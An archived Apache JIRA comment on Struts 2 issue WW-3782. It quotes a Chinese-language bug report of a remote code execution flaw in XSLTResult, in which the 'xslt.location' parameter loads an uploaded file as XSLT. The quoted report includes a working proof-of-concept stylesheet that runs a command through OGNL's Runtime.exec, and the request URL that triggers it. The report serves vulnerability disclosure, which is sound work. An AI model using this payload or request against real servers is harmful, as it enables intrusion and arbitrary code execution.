You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "zhouyanming (Commented) (JIRA)" <ji...@apache.org> on 2012/03/22 04:20:04 UTC
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235302#comment-13235302 ]
zhouyanming commented on WW-3782:
---------------------------------
哥们太搞了,天朝还没占领全世界
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira